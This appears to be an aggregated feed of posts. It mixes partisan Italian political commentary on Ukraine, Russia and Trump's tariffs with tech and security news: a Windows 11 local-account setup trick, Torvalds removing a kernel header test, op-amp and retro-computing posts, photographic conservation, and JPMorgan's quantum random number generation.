Dal canto suo la Russia in questi 11 anni ha fatto più volte la sua unica richiesta: non espandere ulteriormente la NATO verso i propri confini. Una richiesta che, come riferito da Stoltenberg poco dopo l’inizio dell’intervento di Mosca, era una precondizione per impedire l’invasione del suolo ucraino e che la NATO ha rigettato immediatamente. Lo stesso Peskov, portavoce del Cremlino, aveva riferito riguardo l’assenza di ogni ostacolo da parte russa per l’adesione dell’Ucraina all’Unione Europea, in quanto non intacca la questione della sicurezza dei confini russi. L’Europa ha preferito garantire gli interessi USA a discapito dei propri.

Alla luce di questo nuovo accordo sui minerali proposto da Trump a Zelensky, che oltretutto non comprende tutta la lunghissima ricostruzione del paese, già preda di aziende multinazionali occidentali che si sfregano le mani per i profitti che faranno, dovremmo farci una domanda:

Dobbiamo salvare l’Ucraina dai russi o dagli Stati Uniti?

Forse la verità è quella che quelli che vengono chiamati “putinisti pacifinti” ripetono da anni. L’Ucraina è solo una vittima, non dei russi, ma di un occidente decaduto che cerca con le unghie e con i denti di rifiutare un mondo che non accetta più la sua violenta egemonia. La cosa migliore per Zelensky sarebbe voltarsi, rivolgere le armi verso Ovest e far finire lui la guerra. Se solo avesse reamente il potere di farlo, ma non ce l’ha.



Trump, un lupo impazzito che vuole passare per agnello.


In un discorso al congresso di qualche giorno fa, #TRUMP, alias #postus ha dichiarato "In qualunuque modo ci tasseranno, noi tasseremo loro!"

Il riferimento è ovviamente ai dazi, e la domanda dunque sorge spontanea: com'è possibile che per moliti americani Biden non si potesse eleggere in quanto ormai "rimbecillito", ma alla fine ci ritroviamo questo qui? Questo vi pare normale?

Certo, Trump dice tutte queste cose con lucidità, probabilmente, tanto da far sorgere un'altra domanda.

Cosa vi ricorda qualcuno che crea un problema e poi vuol far credere di essere le vittima quando gli altri rispondono al problema da lui stesso causato?

Come si chiama questa situazione, che ora non mi sovviene? Ah, sì! Putin.

Fateci caso, la dialettica è esattamente la stessa. Non credo che servano ulteriori dimostrazioni.

#russia
#usa
#putin
#paraculo
#statiuniti
#dazi



Windows 11: Scoperto un Nuovo Trucco per Evitare l’Account Microsoft


Microsoft continua la sua strategia per costringere gli utenti di Windows 11 a usare un account Microsoft durante l’installazione del sistema operativo, chiudendo una dopo l’altra le scappatoie che permettevano di utilizzare un account locale. Ma la comunità degli utenti non si arrende e ha appena scoperto un nuovo trucco che rende il processo più semplice che mai!

Microsoft vs. account locali


Sin dal rilascio di Windows 11, Microsoft ha progressivamente reso più difficile la creazione di account locali, spingendo gli utenti verso un modello basato su servizi cloud. L’azienda giustifica questa scelta con la necessità di migliorare la sicurezza e l’integrazione con i suoi servizi, ma per molti utenti ciò rappresenta una forzatura che limita la libertà di scelta.

In passato, esistevano diverse soluzioni per aggirare questa restrizione, come l’uso di comandi nascosti o script dedicati. Tuttavia, Microsoft ha chiuso molte di queste porte, rendendo più complicato evitare la creazione di un account online. Ora, però, è emersa una nuova scappatoia!

Il nuovo metodo per bypassare l’account Microsoft


Il colosso di Redmond ha recentemente rimosso il noto script ‘BypassNRO.cmd’ dalle build di anteprima di Windows 11, rendendo più difficile aggirare l’obbligo dell’account Microsoft. Sebbene fosse ancora possibile intervenire manualmente nel Registro di sistema, il processo risultava più scomodo e complicato per gli utenti meno esperti.

Ma sabato scorso, un utente di X con il nickname “Wither OrNot” ha svelato un metodo molto più semplice. Il trucco? Un semplice comando che apre una finestra nascosta per la creazione di un account locale!

Ecco come fare:

  1. Durante l’installazione di Windows 11, quando viene visualizzata la schermata “Connettiamoci a una rete”, premere Shift + F10 per aprire il prompt dei comandi.
  2. Digitare il comando start ms-cxh:localonly e premere Invio.
  3. Si aprirà una finestra per la creazione di un account locale.
  4. Inserire i dati richiesti e cliccare su Avanti.
  5. La configurazione proseguirà senza richiedere un account Microsoft!


Sicurezza e implicazioni del metodo


Se da un lato questa soluzione permette di mantenere il controllo sul proprio dispositivo, dall’altro va considerato il possibile impatto sulla sicurezza. Microsoft promuove l’uso di account online per abilitare funzionalità come la sincronizzazione dei dati, il ripristino password e una maggiore protezione contro il furto di credenziali. Tuttavia, alcuni utenti vedono queste misure più come un vincolo che un vantaggio.

Utilizzare un account locale può aumentare la privacy e ridurre la dipendenza dai servizi cloud di Microsoft, ma bisogna ricordarsi di adottare buone pratiche di sicurezza, come l’uso di password robuste e l’attivazione di misure di protezione locali.

Conclusione


Microsoft eliminerà anche questa possibilità? È ancora presto per dirlo. Tuttavia, a differenza del vecchio script ‘BypassNRO.cmd’, questo comando sembra essere più profondamente integrato nel sistema operativo, il che potrebbe renderne più difficile la rimozione.

Ancora una volta, la community dimostra di saper aggirare le limitazioni imposte da Microsoft, riaffermando il diritto degli utenti di scegliere come gestire i propri dispositivi. Il confronto tra chi difende la libertà di utilizzo e la visione cloud-first dell’azienda di Redmond continua senza sosta!

Nel frattempo, chi desidera mantenere il controllo sul proprio dispositivo ha ancora una possibilità. Per quanto tempo? Lo scopriremo solo nei prossimi aggiornamenti di Windows 11!

L'articolo Windows 11: Scoperto un Nuovo Trucco per Evitare l’Account Microsoft proviene da il blog della sicurezza informatica.



A Bologna la prima storica partita di Rugby nel Metaverso


Bologna, 27 marzo 2025 – In un contesto in cui la trasformazione digitale si intreccia con le sfide dell’inclusione sociale, la Fondazione Olitec si conferma come punto di riferimento nazionale nella promozione di tecnologie emergenti a vocazione umanistica.

È quanto emerso anche nell’ultimo articolo pubblicato da una delle più autorevoli testate locali, che ha messo in luce il contributo dell’ecosistema Olitec nell’ambito del progetto promosso da Fondazione Carisbo, Comune di Bologna, Fondazione Golinelli e altre istituzioni di prim’ordine nelle attività educative e sociali che coinvolgono donne, giovani e categorie svantaggiate. Tra le iniziative più visionarie spicca il progetto “Sport & Metaverso” ideato da Erika Morri, che utilizza la realtà immersiva per portare i valori dello sport nelle scuole secondarie e nei contesti a rischio di abbandono scolastico.

Attraverso ambienti digitali tridimensionali e simulazioni interattive, i ragazzi possono sperimentare dinamiche di squadra, superare ostacoli, allenare la concentrazione e apprendere, divertendosi, come la disciplina sportiva possa diventare strumento di crescita personale e collettiva. fragili.

Cuore pulsante di numerosi progetti BRIA (Bioinformatica, Realtà Immersiva, Intelligenza Artificiale), la Fondazione Olitec è riuscita a costruire negli ultimi anni un modello di impatto che integra formazione, ricerca e collocamento, affermandosi come catalizzatore di rigenerazione territoriale. Le sue iniziative, spesso sviluppate in sinergia con istituzioni pubbliche e private, mettono al centro la persona, in particolare i giovani che rischiano di restare esclusi dalle traiettorie di crescita del Paese. In molte scuole secondarie italiane, grazie alla collaborazione con dirigenti scolastici, insegnanti ed educatori, i percorsi BRIA vengono introdotti come veri e propri laboratori di orientamento e innovazione. I ragazzi imparano non solo competenze tecniche, ma anche a lavorare in gruppo, a risolvere problemi, a esplorare nuove professioni emergenti in ambiti come la sanità digitale, l’edilizia smart e la sostenibilità ambientale. Questo approccio olistico permette di creare comunità educanti in cui la tecnologia diventa ponte tra il presente dei ragazzi e il loro futuro possibile.

«Abbiamo voluto che la tecnologia tornasse ad essere strumento e non fine, e che servisse a costruire futuro in contesti dove c’erano solo porte chiuse», ha dichiarato Massimiliano Nicolini, direttore del dipartimento ricerca della Fondazione Olitec e ideatore del manifesto BRIA. «Nel nostro progetto ‘Tech & Hope’, ad esempio, portiamo donne vulnerabili ad apprendere competenze d’avanguardia per inserirle nel mondo dell’impresa con dignità e autonomia. Questa è la nuova frontiera dell’innovazione etica».

Protagonista e ideatrice di questo cambiamento è Erika Morri, ex giocatrice della nazionale italiana di rugby e fondatrice del progetto “Sport & Metaverso”, da sempre impegnata nel sociale e nella promozione dei diritti dei più giovani. «Quando incontriamo questi giovani, spesso ci colpisce lo smarrimento di chi non riesce a immaginare il proprio futuro. Ma attraverso i percorsi scolastici BRIA, portati nelle scuole grazie all’impegno della Fondazione Olitec, si riaccende in loro una scintilla. Ritrovano curiosità, consapevolezza delle proprie capacità, e una visione concreta di ciò che possono diventare. È un processo educativo che li trasforma dall’interno, facendoli sentire finalmente protagonisti del proprio destino», ha dichiarato. Morri ha inoltre sottolineato come l’attività sportiva immersiva nel metaverso aiuti i ragazzi a sviluppare la capacità di collaborazione, la gestione emotiva e l’autostima, inserendo l’allenamento del corpo e della mente in una narrazione moderna e coinvolgente. «Con ‘Sport & Metaverso’ – ha aggiunto – abbattiamo il muro tra il digitale e la realtà. Lo sport diventa un linguaggio universale che parla ai giovani con i codici che appartengono alla loro generazione».

Lo sottolinea anche Elisabetta Bracci, esperta in economia dell’impatto sociale e componente dell’osservatorio sull’innovazione educativa: «Olitec è un esempio raro di fondazione che sa coniugare visione strategica e prossimità reale. I loro progetti non sono calati dall’alto, ma nascono dentro i territori, e con le persone. Questo rende ogni investimento generativo, sostenibile e replicabile».

Questo programma innovativo unisce l’educazione sportiva con l’esplorazione delle tecnologie immersive, offrendo ai giovani un’esperienza formativa unica in cui i valori dello sport – come la lealtà, la cooperazione e la resilienza – vengono vissuti e potenziati attraverso ambienti virtuali immersivi. Iniziative come queste stanno suscitando l’interesse di numerosi stakeholder, anche a livello europeo, e trovano ispirazione nell’idea che l’innovazione debba restituire possibilità laddove ci sono state ingiustizie.

La Fondazione Olitec si conferma così non solo un laboratorio di tecnologia avanzata, ma una fucina di speranza concreta, dove la scienza incontra l’empatia e la formazione si trasforma in rinascita.

L'articolo A Bologna la prima storica partita di Rugby nel Metaverso proviene da il blog della sicurezza informatica.



Torvalds furioso: “Distruggete questa spazzatura!” Il codice del kernel Linux sotto accusa


Tutti gli aggiornamenti dei driver grafici della serie DRM-Next sono stati inseriti con successo nel kernel Linux 6.15, ma lo stesso Linus Torvalds non era soddisfatto di uno dei componenti. Il codice in questione è un codice di test chiamato “hdrtest” incluso nella build principale del kernel e, secondo Torvalds, lascia “spazzatura” nell’albero sorgente. Con il suo tipico tono schietto, ha affermato che il codice “dovrebbe essere distrutto”, almeno dal punto di vista degli sviluppatori.

In una lettera alla mailing list pubblicata recentemente, Torvalds ha scritto che era irritato dall’introduzione della “odiosa spazzatura hdrtest” e che a) rallenta la build perché viene eseguita come parte di una build allmodconfig completa, anziché come un test separato su richiesta; b) lascia file casuali nelle directory include, ingombrando l’albero sorgente.

Ha fatto notare che in precedenza c’erano state lamentele in merito e che il codice non avrebbe dovuto essere inserito nel ramo principale in questa forma. “Perché questi test vengono eseguiti come parte di una build normale? — Torvalds era indignato. “Non aggiungiamo file di dipendenza casuali che corrompono l’albero sorgente.”

Ha anche aggiunto che era grazie a “git status” che si lamentava dei file spazzatura aveva notato il problema. Ma la cosa peggiore è che questi file interferiscono con il completamento del nome quando si lavora nella console. E aggiungerli a .gitignore, secondo lui, avrebbe solo mascherato il problema, non lo avrebbe risolto.

Ha finito per disabilitare temporaneamente hdrtest, contrassegnandolo come BROKEN. “Se vuoi eseguire questo hdrtest, fallo come parte dei tuoi test. Non far vedere agli altri quella cosa disgustosa sul tuo albero. È meglio renderlo un target di build separato come make drm-hdrtest piuttosto che parte della build standard”, ha concluso.

A prima vista, potrebbe sembrare che stiamo parlando di testare il supporto HDR (High Dynamic Range), soprattutto perché di recente Linux ha lavorato attivamente sulla gestione del colore e sulla gamma dinamica estesa. Tuttavia, a un esame più attento si è scoperto che “hdr” in questo caso significa header, ovvero file C-header. Il codice hdrtest è per il nuovo driver Intel Xe e viene utilizzato per verificare che gli header DRM siano scritti correttamente, siano autosufficienti e superino la verifica kernel-doc. Vale a dire, questo è un banale controllo di qualità dei file di servizio, semplicemente implementato in modo non riuscito.

Quindi l’intero ramo DRM-Next è già arrivato in Linux 6.15, ma ora gli sviluppatori devono ripulire le loro tracce, altrimenti Torvalds si assicurerà personalmente che hdrtest scompaia dal kernel principale.

L'articolo Torvalds furioso: “Distruggete questa spazzatura!” Il codice del kernel Linux sotto accusa proviene da il blog della sicurezza informatica.



Why the LM741 Sucks


First of all, we’d like to give a big shout-out to [Afrotechmods]! After a long hiatus, he has returned to YouTube with an awesome new video all about op-amp characteristics, looking at the relatively awful LM741 in particular. His particular way of explaining things has definitely helped many electronics newbies to learn new concepts quickly!

Operational amplifiers have been around for a long time. The uA741, now commonly known as the LM741, was indeed an incredible piece of technology when it was released. It was extremely popular through the 1970s and onward as it saved designers the chore of designing a discrete amplifier. Simply add a few external components, and you have a well-behaved amplifier.

But as the years went on, many new and greatly improved op-amps have been developed, but either because of nostalgia or reticence, many in the field (especially, it seems, professors teaching electronics) have continued to use the LM741 in examples and projects. This is despite its many shortcomings:

  • Large input offset voltage
  • Large input offset current
  • Low gain-bandwidth product
  • Miserable slew rate of only 0.5V/uS

And that’s not even the full list. Newer designs have vastly improved all of these parameters, often by orders of magnitude, yet the LM741 still appears in articles aimed at those new to electronics, even in 2025. There are literal drop-in replacements for the LM741, such as the TLC081 (not to be confused with the similarly named FET-input TL081), which has 32 times the slew rate, 10 times the gain-bandwidth product, and an input offset voltage almost 2 orders of magnitude better!

So, check out the full video below, learn about op-amp parameters, and start checking out modern op-amps!

youtube.com/embed/e67WiJ6IPlQ?…


hackaday.com/2025/04/01/why-th…



An Elegant Writer for a More Civilized Age


One of the most exciting trends we’ve seen over the last few years is the rise of truly personal computers — that is, bespoke computing devices that are built by individuals to fit their specific needs or wants. The more outlandish of these builds, often inspired by science fiction and sporting non-traditional layouts, tend to be lumped together under the term “cyberdecks”, but there are certainly builds where that description doesn’t quite stick, including the Cyber Writer from [Darbin Orvar].

With a 10-inch screen, you might think it was intended to be a portable, but its laser-cut Baltic birch plywood construction says otherwise. Its overall design reminds us of early computer terminals, and the 60% mechanical keyboard should help reinforce that feeling that you’re working on a substantial piece of gear from yesteryear.
There’s plenty of room inside for additional hardware.
The Cyber Writer is powered by the Raspberry Pi Zero W 2, which might seem a bit underpowered, but [Darbin] has paired it with a custom minimalist word processor. There’s not a lot of detail about the software, but the page for the project says it features integrated file management and easy email export of documents.

The software isn’t yet available to the public, but it sounds like [Darbin] is at least considering it. Granted, there’s already distraction-free writing software out there, but we’re pretty firm believers that there’s no such thing as too many choices.

If you’re looking for something a bit more portable, the impressive Foliodeck might be more your speed.

youtube.com/embed/sIItE5ro-ko?…


hackaday.com/2025/04/01/an-ele…

reshared this



A Forgotten Photographic Process Characterised


Early photography lacked the convenience of the stable roll film we all know, and instead relied on a set of processes which the photographer would have to master from film to final print. Photographic chemicals could be flammable or even deadly, and results took a huge amount of work.

The daguerreotype process of using mercury to develop pictures on polished metal, and the wet-collodion plate with its nitrocellulose solution are well-known, but as conservators at the British National Archives found out, there was another process that’s much rarer. The Pannotype uses a collodion emulsion, but instead of the glass plate used by the wet-plate process it uses a fabric backing.

We know so much about the other processes because they were subject to patents, but pannotype never had a patent due to a disagreement. Thus when the conservators encountered some pannotypes in varying states of preservation, they needed to apply modern analytical techniques to understand the chemistry and select the best methods of stabilization. The linked article details those analyses, and provides them with some pointers towards conserving their collection. We look forward to someone making pannotype prints here in 2025, after all it’s not the first recreation of early photography we’ve seen.


hackaday.com/2025/04/01/a-forg…



Il caso Morse Corp.: una storia di cybersecurity e difesa


@Informatica (Italy e non Italy 😁)
Si combatte una delle battaglie più critiche del nostro tempo: la protezione dei dati sensibili che riguardano la sicurezza nazionale. Ma cosa succede quando chi è incaricato di proteggere queste informazioni fallisce? Questa è la storia di Morse Corp., un contractor della difesa che ha imparato



JPMorgan fa la storia: numeri veramente casuali grazie all’informatica quantistica!


La banca americana JPMorgan Chase per la prima volta al mondo ha generato e verificato numeri realmente casuali utilizzando un computer quantistico. Questo sviluppo potrebbe rappresentare un passo importante verso il miglioramento della sicurezza nel mondo digitale e potrebbe trovare applicazione in settori quali la crittografia, il trading e le lotterie online.

Lo Studio è stato pubblicato sulla rivista Nature e descrive come gli specialisti bancari, insieme ai laboratori nazionali Argonne e Oak Ridge, nonché all’Università del Texas ad Austin, hanno utilizzato un computer quantistico di Quantinuum (una sussidiaria di Honeywell) per generare numeri casuali. Dopodiché gli scienziati hanno dimostrato per la prima volta matematicamente che i dati ottenuti erano realmente casuali e non pseudo-casuali, come solitamente accade.

In realtà i generatori di numeri casuali convenzionali utilizzati nei sistemi informatici non sono completamente casuali. Si basano su algoritmi matematici predefiniti che, se eseguiti sugli stessi dati, produrranno sempre lo stesso risultato. Ciò rende tali sistemi potenzialmente vulnerabili, soprattutto se si considera la crescente potenza di calcolo. l’interesse degli hacker criminali e lo sviluppo dell’intelligenza artificiale.

In passato altre aziende si sono occupate della generazione di numeri casuali, tra cui Quantinuum, i cui prodotti sono già utilizzati nei data center e nei contatori intelligenti. Tuttavia, la JPMorgan è riuscita non solo a ottenere tali numeri, ma anche a confermarne la reale casualità. Ciò è particolarmente importante per i settori mission-critical come la finanza e la sicurezza delle infrastrutture, in cui ogni elemento deve essere verificabile e sicuro.

“Questo potrebbe essere utile ovunque sia importante dimostrare che un numero è veramente casuale, come nelle lotterie o quando si effettua revisione contabile” ha affermato Konstantinos Karagiannis, direttore del quantum computing presso la società di consulenza Protiviti. Non è stato coinvolto nello studio, ma ha sottolineato: “Nella crittografia, è tutta una questione di prova: o il sistema è sicuro o non lo è. Non ci sono mezzitoni.”

Il lavoro è durato un anno: da maggio 2023 a maggio 2024, i crittografi della JPMorgan hanno sviluppato uno speciale algoritmo per un computer quantistico, dopodiché hanno utilizzato i supercomputer del Dipartimento dell’Energia degli Stati Uniti per verificare i risultati.

Si tratta di una svolta, afferma il responsabile del progetto Marco Pistoia, a capo della ricerca sulle tecnologie applicate presso JPMorgan: “Il passo successivo è capire dove possiamo applicarlo”.

Le possibili applicazioni spaziano dalla creazione di criptovalute più efficienti dal punto di vista energetico al gioco d’azzardo online e persino alla selezione automatizzata dei seggi elettorali per le verifiche elettorali. Tutto ciò in cui è importante la casualità completa e verificabile può trarre vantaggio dalla nuova tecnologia.

L’interesse per l’informatica quantistica sta crescendo rapidamente: sebbene per ora sia ancora nelle mani dei ricercatori, è chiaro che la sua potenza supera di gran lunga le capacità dei computer classici. L’unico problema è la difficoltà a trovare applicazioni pratiche e l’elevato costo delle attrezzature.

JPMorgan investe attivamente in questo settore da sei anni, individuando opportunità nella finanza, nell’intelligenza artificiale, nell’ottimizzazione e soprattutto nella crittografia. “Per noi la tecnologia quantistica è strategica”, ha affermato Pistoia. Lui e il suo team stanno ora studiando come utilizzare l’informatica quantistica per l’apprendimento automatico, l’ottimizzazione del portafoglio e la determinazione del prezzo dei derivati.

L'articolo JPMorgan fa la storia: numeri veramente casuali grazie all’informatica quantistica! proviene da il blog della sicurezza informatica.